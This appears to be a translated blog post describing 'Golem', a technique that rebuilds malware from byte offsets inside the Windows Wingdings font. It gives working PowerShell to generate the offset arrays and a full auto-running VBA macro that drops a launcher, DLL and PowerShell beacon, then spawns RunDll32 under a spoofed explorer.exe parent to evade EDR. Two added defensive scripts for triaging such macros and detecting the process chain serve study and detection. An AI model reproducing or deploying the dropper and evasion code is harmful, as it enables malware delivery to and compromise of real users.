Friday, 1 February 2019

Golem Malware - The Malware Hiding in Your Windows Fonts Folder (Chinese translation)

Source: http://sysadminconcombre.blogspot.com/2018/11/golem-malware-malware-hiding-in-your.html
Golem (puppet) malware: the malware hiding in your Windows font files
Introduction
  There is a class of technique that piggybacks on legitimate binaries already installed on the system (LoLBINs, Living-Off-the-Land Binaries), using the victim's own machine to carry out the malicious actions. Nothing has to hide inside an attachment or be converted after delivery; the pieces are already sitting on the victim's machine.
  That said, most attacks follow these high-level (Playskool-level) steps:
1.      Deliver a working attachment that contains:
-   the malicious code that needs to be executed
-   or
-   if no malicious code is needed, the code that will download the malicious component in step 3
2.      Trick the victim into running the attachment
3.      The attachment then:
-   executes the malicious component through a LoLBIN
-   or
-   downloads the malicious component and executes it through a LoLBIN
Goal
  I set myself a standard to follow:
1.      Carry no malicious code while passing through mail filters, sandboxes and the like (not even bytes of malicious machine code, as in http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html), and download no malicious code either
2.      Still execute malicious code



The malware generates itself anew from the victim's own fonts
  First we need a component that is identical across every version of Windows. I went looking for the Holy Grail, and found this:
  I compared the Wingdings font across the various Windows versions and confirmed it is identical on all of them.
  To reach our goal, the font has to be present on every Windows machine. How do we use it? The steps are:
1.      Collect the bytes of our malware on our own machine
2.      Compare its first byte against the bytes of the Wingdings font
3.      When I find the same byte value inside the font, I record that position in a text file
4.      Repeat until every byte of the malware has been matched, recording each position in the text file
5.      Our payload is then the position, inside the Wingdings font, of every byte of the malware
6.      On the victim machine, the payload rebuilds the malicious component from the bytes of the Wingdings font



PowerShell code used to look up the malware's bytes inside the font:
$Font = "C:\Windows\Fonts\wingding.ttf"
$Malware = "C:\Users\Administrator\Pictures\2.PNG"

$fontArray = Get-Content $Font -Encoding Byte -ReadCount 0
$malwareArray = Get-Content $Malware -Encoding Byte -ReadCount 0
$offsetArray = @()
foreach ($byteInMalware in $malwareArray){
    $index = 0
    foreach ($byteInFont in $fontArray) {
        if ($byteInMalware -eq $byteInFont) {
            $offsetArray += $index
            break
        }
        $index++
    }   
}
  PowerShell code that generates the VBA to paste into the macro; the generated VBA holds the position of every byte used to rebuild the malicious component:
$i=0
$payload = ""
$j=0
$u=1
$payDef = ""
foreach($offset in $offsetArray){  
 
    if($i -eq 30) {
        $payload = $payload + ", " + $offset + " _`r`n"
        $i=0       
        $j++ 
    }
    else {
       if($i -eq 0) {
        $payload = $payload + $offset       
       }
       else {
        $payload = $payload + ", " + $offset       
       }
    }
    if($j -eq 25)  {
        $payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
        $payload = ""
        $u++
        $j = 0
    }
    $i++
}
if($payload -ne ""){
$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
}
 
$payDef
The result looks like this:



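Working from the output shape above (Function cccN() wrapping an Array(...) of positions), here is an added triage script, not part of the original post, that an analyst can run over a macro recovered from a suspicious document. It parses the offset arrays, rebuilds the bytes they select from a supplied font, and checks whether the result carries an MZ header, which is what turns a pile of integers into a sample you can hash and analyse. The macro text and the 256-byte stand-in font in the block are constructed; olevba as the extraction step and the 1-based reading of the offsets (VBA's Mid() is 1-based) are assumptions.

```python
"""Triage helper for Office macros that rebuild a payload from font offsets.

Added example (not code from the original post).  It parses the
"Function cccN() / ttN = Array(...)" blocks the generator emits, reassembles
the bytes they point at from a supplied font file, and reports the indicators
an analyst would act on.  Assumptions (not from the page): the macro source
has already been extracted (for example with olevba) and is passed in as a
string; the font is passed in as bytes.  Offsets are treated as 1-based
because the macro reads them with Mid(), which is 1-based in VBA.
"""
import re

# One generated VBA function: "Function <name>()" then "<var> = Array(<ints>)".
# Line continuations (" _" + newline) inside the Array(...) are tolerated.
FUNC_RE = re.compile(r"Function\s+(\w+)\s*\(\)\s*\n\s*\w+\s*=\s*Array\((.*?)\)", re.S)


def extract_offset_arrays(vba_source):
    """Return {function_name: [offset, ...]} for every integer Array(...)."""
    arrays = {}
    for name, body in FUNC_RE.findall(vba_source):
        nums = [int(x) for x in re.findall(r"\d+", body)]
        if nums:
            arrays[name] = nums
    return arrays


def _natural_key(name):
    # ccc1, ccc2, ..., ccc10 must be concatenated in numeric, not lexical, order
    m = re.search(r"(\d+)$", name)
    return (int(m.group(1)) if m else 0, name)


def reconstruct(offsets, font, one_based=True):
    """Rebuild the bytes the macro would write, given the font it reads."""
    out = bytearray()
    for off in offsets:
        idx = off - 1 if one_based else off
        if not 0 <= idx < len(font):
            raise ValueError("offset %d lies outside the %d-byte font" % (off, len(font)))
        out.append(font[idx])
    return bytes(out)


def triage(vba_source, font):
    """Return (findings dict, reconstructed payload bytes)."""
    arrays = extract_offset_arrays(vba_source)
    order = sorted(arrays, key=_natural_key)
    offsets = [o for name in order for o in arrays[name]]
    lower = vba_source.lower()
    f = {
        "array_functions": len(order),
        "total_offsets": len(offsets),
        "reads_fonts_dir": "\\fonts\\" in lower,
        "binary_file_open": re.search(r"open\s+.+for\s+binary", lower) is not None,
        "wmi_process_create": "win32_process" in lower,
        "mentions_rundll32": "rundll32" in lower,
        "offsets_fit_font": bool(offsets) and all(1 <= o <= len(font) for o in offsets),
    }
    payload = reconstruct(offsets, font) if f["offsets_fit_font"] else b""
    f["looks_like_pe"] = payload[:2] == b"MZ"
    if f["looks_like_pe"] and f["reads_fonts_dir"] and f["binary_file_open"]:
        f["verdict"] = "likely font-offset dropper"
    elif f["total_offsets"] >= 1000 and f["binary_file_open"]:
        f["verdict"] = "large offset table written to disk: inspect manually"
    else:
        f["verdict"] = "no font-offset dropper pattern"
    return f, payload


# Constructed sample macro in the shape the generator produces.  The offsets
# are 1-based positions into STAND_IN_FONT; a real macro carries thousands.
# STAND_IN_FONT stands in for wingding.ttf: byte value v sits at 0-based
# index v, so 1-based offset v + 1 selects it.
STAND_IN_FONT = bytes(range(256))
SAMPLE_VBA = """Function ccc1()
tt1 = Array(78, 91, 145 _
, 1)
ccc1 = tt1
End Function
Function ccc2()
tt2 = Array(4, 1)
ccc2 = tt2
End Function
Sub cc()
    strFileName = "C:\\Windows\\Fonts\\wingding.ttf"
    Open strFileName For Binary Access Read Shared As #1
End Sub
"""

if __name__ == "__main__":
    findings, payload = triage(SAMPLE_VBA, STAND_IN_FONT)
    for key, value in findings.items():
        print("%-20s %r" % (key, value))
    print("payload head: %r" % payload[:8])
```

On a real document, feed triage() the macro text from olevba and the bytes of the machine's own C:\Windows\Fonts\wingding.ttf; if the rebuilt bytes begin with MZ you have the dropped binary and can hash it, and the file-open, font-directory and Win32_Process indicators give you the strings to hunt for in other documents.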
  The VBA code uses the arrays we created, in order, to rebuild the malicious components; it then picks Explorer.exe as the parent process of RunDll32.exe to confuse EDR ;-)), and finally runs the malicious component inside RunDll32.exe (the .DLL executes the PowerShell script stored in the .ICO resource). Injecting into a process's memory would avoid writing files to disk; the details are left to the reader.
VBA code:
[...] --> your arrays of bytes containing the positions of the necessary bytes in the Wingdings font.

'example to join the bytes for the first malicious component

    t1 = cc1
    t2 = cc2
    t3 = cc3
    t4 = cc4
    t5 = cc5
    t6 = cc6
    t7 = cc7
    t8 = cc8
    t9 = cc9
    t10 = cc10
    t11 = cc11
    t12 = cc12
    t13 = cc13
    t14 = cc14
    t15 = cc15
    t16 = cc16
    t17 = cc17
    t18 = cc18

    ttt = Split(Join(t1, ",") & "," & Join(t2, ",") & "," & Join(t3, ",") & "," & Join(t4, ",") & "," & Join(t5, ",") & "," & Join(t6, ",") & "," & Join(t7, ",") & "," & Join(t8, ",") & "," & Join(t9, ",") _
     & "," & Join(t10, ",") & "," & Join(t11, ",") & "," & Join(t12, ",") & "," & Join(t13, ",") & "," & Join(t14, ",") & "," & Join(t15, ",") & "," & Join(t16, ",") & "," & Join(t17, ",") & "," & Join(t18, ","), ",")


[...]


    Dim nb As Integer
    Dim nb2 As Integer
    nb = UBound(ttt) - LBound(ttt) + 1 'ttt is a joined byte array
    nb2 = UBound(tt) - LBound(tt) + 1
    nb3 = UBound(ttttttt) - LBound(ttttttt) + 1
    Dim intFileNumber As Integer
    Dim i As Integer
    Dim j As Integer
    Dim lngFileSize As Long
    Dim lngFileSize2 As Long
    Dim strBuffer As String
    Dim strBuffer2 As String
    Dim lngCharNumber As Long
    Dim lngCharNumber2 As Long
    Dim strCharacter As String * 1
    Dim strCharacter2 As String * 1
    Dim strFileName As String
    Dim strFileName2 As String
    Dim offset() As Variant
       
    strFileName = "C:\Windows\Fonts\wingding.ttf"
    intFileNumber = FreeFile
    Open strFileName For Binary Access Read Shared As #intFileNumber
        lngFileSize = LOF(intFileNumber)
        strBuffer = Space$(lngFileSize)
        Get #intFileNumber, , strBuffer
    Close #intFileNumber

   Dim nFileNum As Long
   Dim sFilename As String
   Dim ind As Long
   sFilename2 = "C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary that will be used to select the parent of rundll32
   sFilename = "C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will run powershell beacon from an image
   sFilename3 = "C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beacon registered in an .ICO
   nFileNum = FreeFile
   ' a loop would be better ;-)
   Open sFilename2 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb - 1
        ind = lngCharNumber + 1
        off = ttt(lngCharNumber)
        strCharacter = Mid(strBuffer, off, 1)
        Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum
  
   nFileNum = FreeFile
   Open sFilename For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb2 - 1
        ind = lngCharNumber + 1
        off = tt(lngCharNumber)
        strCharacter = Mid(strBuffer, off, 1)
        Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum
  
   nFileNum = FreeFile
   Open sFilename3 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb3 - 1
        ind = lngCharNumber + 1
        off = ttttttt(lngCharNumber)
        strCharacter = Mid(strBuffer, off, 1)
        Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum
   rr
End Sub

Sub rr()
  Dim xx As String
  Dim oihfasf As Object, eopuf As Object, kdj As Object
  Dim oDic As Object, a() As Variant
  Dim pskaf As Integer

  Set oDic = CreateObject("Scripting.Dictionary")

  xx = "."

  Set oihfasf = GetObject("winmgmts:\\" _
      & xx & "\root\CIMV2")
  Set eopuf = oihfasf.ExecQuery _
      ("Select Name, ProcessID FROM Win32_Process", , 48)

  For Each kdj In eopuf
      If (kdj.Properties_("Name").Value) = "explorer.exe" Then
          pskaf = (kdj.Properties_("ProcessID").Value)
      End If
  Next
Dim t As Date

Dim cnt As Long
Dim arr(2) As Byte

Dim xl As String
xl = "C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exe C:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -f C:\Users\Public\Documents\BEACON.ico"" " & pskaf
xx = "."
Set ow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")
Set os = ow.Get("Win32_ProcessStartup")
Set oc = os.SpawnInstance_
Set op = GetObject("winmgmts:\\" & xx & "\root\cimv2:Win32_Process")
op.Create xl, Null, oc, aslh

End Sub
Sub AutoOpen()
    cc
End Sub
Sub Workbook_Open()
    cc
End Sub
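The chain the macro sets up (a launcher dropped under C:\Users\Public\Documents and started through Win32_Process.Create, which in turn starts RunDll32.exe with a DLL from that folder and an .ICO as its argument, under a parent of the launcher's choosing) is what a defender has to spot. The following is an added example, not from the original post, of detection logic over process-creation records in the shape of Sysmon Event ID 1; the field names mirror Sysmon and the four sample events are constructed from the command line in the macro (the PID is made up). Processes created through Win32_Process.Create show up as children of WmiPrvSE.exe, which is why the launcher is attributed to that parent.

```python
"""Detection logic for the execution chain described in the post.

Added example (not code from the original post).  It evaluates
process-creation records shaped like Sysmon Event ID 1; the field names
Image, ParentImage and CommandLine are assumptions mirroring Sysmon, so adapt
them to your SIEM schema.  The sample events are constructed from the command
line in the macro; the PID 4812 is made up.
"""
import re

# Lower-case path markers for folders an unprivileged user can write to.
USER_WRITABLE_MARKERS = ("c:\\users\\public\\", "\\appdata\\", "c:\\programdata\\", "\\temp\\")
OFFICE_IMAGES = ("winword.exe", "excel.exe", "powerpnt.exe")
# rundll32 takes "<dll>,<export> [args]"; the exe and the dll may be quoted.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+?)"?\s*,\s*(\w+)(.*)$', re.I | re.S)
DATA_FILE_RE = re.compile(r"\.(ico|png|jpg|bmp|gif|txt)\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def parse_rundll32(cmdline):
    """Return {"dll", "export", "args"} for a rundll32 command line, else None."""
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    return {"dll": m.group(1).strip(), "export": m.group(2), "args": m.group(3).strip()}


def evaluate(event):
    """Return the list of alert strings raised by one process-creation event."""
    alerts = []
    image, parent = event.get("Image", ""), event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    img, par = basename(image), basename(parent)

    # A dropped launcher in a world-writable folder, started by Office or by WMI.
    if in_user_writable(image) and par in OFFICE_IMAGES + ("wmiprvse.exe",):
        alerts.append("executable in user-writable path launched by %s" % par)

    if img == "rundll32.exe":
        target = parse_rundll32(cmd)
        if target:
            dll = target["dll"].lower()
            if in_user_writable(dll):
                alerts.append("rundll32 loading DLL from user-writable path: " + target["dll"])
            if DATA_FILE_RE.search(target["args"]) and in_user_writable(target["args"]):
                alerts.append("rundll32 export handed a non-code file from a user-writable path")
            # The launcher picks explorer.exe as rundll32's parent, so a benign-looking
            # parent is no reason to suppress: judge the DLL location, not the parent.
            if par == "explorer.exe" and not dll.startswith("c:\\windows\\"):
                alerts.append("rundll32 under explorer.exe loading DLL outside C:\\Windows (parent may be spoofed)")
    return alerts


def scan(events):
    """Evaluate every event; returns one alert list per event, in order."""
    return [evaluate(e) for e in events]


# Constructed sample events: the post's chain followed by two benign records.
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\Public\\Documents\\changeMyParent.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "C:\\Users\\Public\\Documents\\changeMyParent.exe \"C:\\Windows\\system32\\RunDll32.exe "
                    "C:\\Users\\Public\\Documents\\runPoshCode.dll,ComputeFmMediaType -f "
                    "C:\\Users\\Public\\Documents\\BEACON.ico\" 4812"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "C:\\Windows\\system32\\RunDll32.exe C:\\Users\\Public\\Documents\\runPoshCode.dll,"
                    "ComputeFmMediaType -f C:\\Users\\Public\\Documents\\BEACON.ico"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Windows\\system32\\shell32.dll,Control_RunDLL "
                    "\"C:\\Windows\\system32\\desk.cpl\",,0"},
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for event, alerts in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(event["Image"]), "<-", basename(event["ParentImage"]))
        for a in alerts:
            print("   ALERT:", a)
```

The point of the third rule is the parent-selection trick in the macro: because the launcher chooses explorer.exe as the parent of RunDll32.exe, a rule that whitelists rundll32 under explorer would miss it, so the decision rests on where the DLL and its argument live rather than on who the parent appears to be.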
That is the end of the article!
